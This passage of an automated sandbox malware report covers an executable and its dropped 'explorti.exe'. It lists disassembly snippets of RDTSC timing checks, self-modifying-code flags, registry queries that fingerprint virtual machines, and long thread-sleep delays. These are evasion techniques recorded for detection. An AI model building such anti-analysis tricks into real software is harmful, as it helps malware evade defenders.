Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53900A7 second address: 53900E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FF4D529DDF0h 0x0000000c jmp 00007FF4D529DDF5h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 and esp, FFFFFFF8h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF4D529DDEAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53900E7 second address: 5390136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 388BCD87h 0x0000000b popad 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF4D46D40C8h 0x00000014 sub ax, E268h 0x00000019 jmp 00007FF4D46D40BBh 0x0000001e popfd 0x0000001f push esi 0x00000020 mov ecx, edi 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov di, 6562h 0x0000002a mov dx, 75AEh 0x0000002e popad 0x0000002f xchg eax, ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390136 second address: 539013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539013C second address: 5390192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF4D46D40C5h 0x0000000b sub esi, 6BB1C5E6h 0x00000011 jmp 00007FF4D46D40C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FF4D46D40BEh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF4D46D40BEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390192 second address: 5390198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390198 second address: 539019C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539019C second address: 539020C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FF4D529DDEEh 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FF4D529DDEEh 0x0000001b sbb cx, DE48h 0x00000020 jmp 00007FF4D529DDEBh 0x00000025 popfd 0x00000026 mov ecx, 229371BFh 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007FF4D529DDEEh 0x00000036 sbb ax, 20A8h 0x0000003b jmp 00007FF4D529DDEBh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539020C second address: 539027A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF4D46D40C8h 0x00000008 add al, 00000008h 0x0000000b jmp 00007FF4D46D40BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FF4D46D40C8h 0x00000019 adc si, B568h 0x0000001e jmp 00007FF4D46D40BBh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF4D46D40C4h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539027A second address: 53902E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF4D529DDF1h 0x00000009 or esi, 137BEE36h 0x0000000f jmp 00007FF4D529DDF1h 0x00000014 popfd 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF4D529DDEFh 0x00000024 sub ax, 2B6Eh 0x00000029 jmp 00007FF4D529DDF9h 0x0000002e popfd 0x0000002f mov edi, esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53902E2 second address: 5390314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF4D46D40C3h 0x00000008 pop ecx 0x00000009 mov ebx, 67342F2Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF4D46D40BEh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390314 second address: 539036E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007FF4D529DDEDh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esp 0x0000000f pushad 0x00000010 mov dh, al 0x00000012 pushfd 0x00000013 jmp 00007FF4D529DDEFh 0x00000018 or ch, 0000003Eh 0x0000001b jmp 00007FF4D529DDF9h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF4D529DDEDh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 539036E second address: 5390374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390374 second address: 5390378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390378 second address: 5390412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007FF4D46D40C6h 0x00000012 je 00007FF546262322h 0x00000018 jmp 00007FF4D46D40C0h 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 call 00007FF4D46D40BEh 0x0000002a pushfd 0x0000002b jmp 00007FF4D46D40C2h 0x00000030 sbb al, 00000058h 0x00000033 jmp 00007FF4D46D40BBh 0x00000038 popfd 0x00000039 pop eax 0x0000003a popad 0x0000003b je 00007FF5462622E8h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF4D46D40C1h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5390412 second address: 5390472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FF4D529DDEEh 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FF4D529DDF0h 0x00000019 test edx, 61000000h 0x0000001f jmp 00007FF4D529DDF0h 0x00000024 jne 00007FF546E2C00Dh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, D590h 0x00000031 mov si, bx 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380890 second address: 5380896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380896 second address: 538089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 538089A second address: 53808CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF4D46D40BFh 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF4D46D40C0h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53808CA second address: 53808CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53808CE second address: 53808D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53808D4 second address: 5380990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF4D529DDF0h 0x0000000f push eax 0x00000010 jmp 00007FF4D529DDEBh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007FF4D529DDF6h 0x0000001b xchg eax, esi 0x0000001c jmp 00007FF4D529DDF0h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FF4D529DDF1h 0x00000029 and ah, FFFFFFC6h 0x0000002c jmp 00007FF4D529DDF1h 0x00000031 popfd 0x00000032 pushfd 0x00000033 jmp 00007FF4D529DDF0h 0x00000038 sbb esi, 79579668h 0x0000003e jmp 00007FF4D529DDEBh 0x00000043 popfd 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FF4D529DDF5h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380990 second address: 5380998 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380998 second address: 53809DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a jmp 00007FF4D529DDEFh 0x0000000f sub ebx, ebx 0x00000011 jmp 00007FF4D529DDEFh 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF4D529DDF5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53809DB second address: 5380B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF546269A54h 0x0000000f jmp 00007FF4D46D40BEh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c jmp 00007FF4D46D40BEh 0x00000021 pushfd 0x00000022 jmp 00007FF4D46D40C2h 0x00000027 adc ax, 9248h 0x0000002c jmp 00007FF4D46D40BBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ecx, esi 0x00000035 jmp 00007FF4D46D40C6h 0x0000003a je 00007FF546269A02h 0x00000040 jmp 00007FF4D46D40C0h 0x00000045 test byte ptr [76FA6968h], 00000002h 0x0000004c jmp 00007FF4D46D40C0h 0x00000051 jne 00007FF5462699E8h 0x00000057 pushad 0x00000058 pushfd 0x00000059 jmp 00007FF4D46D40BEh 0x0000005e and ax, 0238h 0x00000063 jmp 00007FF4D46D40BBh 0x00000068 popfd 0x00000069 pushfd 0x0000006a jmp 00007FF4D46D40C8h 0x0000006f sub esi, 0095FC98h 0x00000075 jmp 00007FF4D46D40BBh 0x0000007a popfd 0x0000007b popad 0x0000007c mov edx, dword ptr [ebp+0Ch] 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 pushfd 0x00000083 jmp 00007FF4D46D40C1h 0x00000088 and al, 00000036h 0x0000008b jmp 00007FF4D46D40C1h 0x00000090 popfd 0x00000091 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380C2F second address: 5380C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380C35 second address: 5380C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380C8B second address: 5380CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380CAF second address: 5380CB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380CB3 second address: 5380CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380CC6 second address: 5380D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D46D40BFh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f jmp 00007FF4D46D40BBh 0x00000014 mov esp, ebp 0x00000016 jmp 00007FF4D46D40C6h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380D09 second address: 5380D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5380D0D second address: 5380D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5410710 second address: 5410728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5410728 second address: 5410745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FF4D46D40BCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5410745 second address: 541075E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FF4D529DDF3h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 541075E second address: 541077F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4C8Bh 0x00000007 movzx eax, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov edx, 206DA9ACh 0x00000015 mov di, B498h 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 541077F second address: 5410783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5410783 second address: 541079B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 541079B second address: 54107A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400B37 second address: 5400B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF4D46D40C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400908 second address: 54009B8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF4D529DDEAh 0x00000008 add ecx, 47FD9A18h 0x0000000e jmp 00007FF4D529DDEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov bx, si 0x00000021 pushfd 0x00000022 jmp 00007FF4D529DDF6h 0x00000027 adc ecx, 1D097BA8h 0x0000002d jmp 00007FF4D529DDEBh 0x00000032 popfd 0x00000033 popad 0x00000034 push eax 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FF4D529DDF2h 0x0000003c xor esi, 33CBEE08h 0x00000042 jmp 00007FF4D529DDEBh 0x00000047 popfd 0x00000048 popad 0x00000049 xchg eax, ebp 0x0000004a jmp 00007FF4D529DDF6h 0x0000004f mov ebp, esp 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF4D529DDF7h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 54009B8 second address: 54009BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 54009BE second address: 54009C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 54009C2 second address: 5400A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF4D46D40BBh 0x00000015 sbb ax, 810Eh 0x0000001a jmp 00007FF4D46D40C9h 0x0000001f popfd 0x00000020 call 00007FF4D46D40C0h 0x00000025 pop eax 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0112 second address: 53A012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A012A second address: 53A0153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF4D46D40C5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 53A0153 second address: 53A0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400E15 second address: 5400E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400E1A second address: 5400E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FF4D529DDEEh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FF4D529DDF0h 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400E4B second address: 5400E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400E51 second address: 5400E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400EE5 second address: 5400EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: 5400EEB second address: 5400EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C26678 second address: C2667C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2667C second address: C26680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C26680 second address: C2668D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2668D second address: C26691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C268A6 second address: C268C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4D46D40C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Special instruction interceptor: First address: A7E962 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Special instruction interceptor: First address: A7E9F7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Special instruction interceptor: First address: C20D57 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	Special instruction interceptor: First address: CACA75 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 67E962 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 67E9F7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 820D57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8ACA75 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\LbMTyCFRzs.exe

Code function: 0_2_05400DB3 rdtsc

0_2_05400DB3

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 428	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 777	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 597	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1151	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7952	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7952	Thread sleep time: -96048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7956	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7956	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep count: 428 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep time: -12840000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8040	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7932	Thread sleep count: 777 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7932	Thread sleep time: -1554777s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7936	Thread sleep count: 597 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7936	Thread sleep time: -1194597s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7940	Thread sleep count: 1151 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7940	Thread sleep time: -2303151s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep time: -30000s >= -30000s	Jump to behavior

